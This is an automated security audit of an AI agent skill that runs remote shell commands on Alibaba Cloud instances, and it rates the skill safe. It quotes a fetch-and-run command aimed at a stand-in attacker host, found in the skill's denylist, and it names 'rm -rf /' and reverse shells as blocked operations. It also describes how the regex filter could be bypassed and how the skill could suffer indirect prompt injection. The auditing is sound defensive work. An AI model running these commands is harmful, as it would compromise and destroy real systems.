alibabacloud-sas-openclaw-security
Pass
Audited by Gen Agent Trust Hub on Apr 1, 2026
Risk Level: SAFECOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill facilitates the remote execution of shell commands on Alibaba Cloud ECS instances using the
run_cloud_assistant_command.pyscript and the officialaliyunCLI. This is the core functionality of the skill and is documented with explicit security guidelines and user confirmation requirements. - [REMOTE_CODE_EXECUTION]: Several automated alerts regarding remote code execution (e.g.,
curl http://evil.com/x.sh | bash) were investigated. These specific strings were found within a security denylist (_BLOCKED_PATTERNS) inscripts/run_cloud_assistant_command.py. They serve as regex patterns and descriptive examples for a filter designed to prevent malicious command execution, not to perform it. - [COMMAND_EXECUTION]: The script
scripts/run_cloud_assistant_command.pyimplements a regex-based security control to block destructive operations (such asrm -rf /) and reverse shell attempts. While this provides a layer of defense, users should note that regex-based filters for shell commands are potentially bypassable via shell obfuscation or expansion techniques. - [PROMPT_INJECTION]: The skill ingests data from external security alerts and vulnerability records to generate Markdown reports and security summaries. This creates a surface for indirect prompt injection (Category 8) if an attacker can influence the metadata (such as vulnerability names) within the user's Alibaba Cloud environment.
Audit Metadata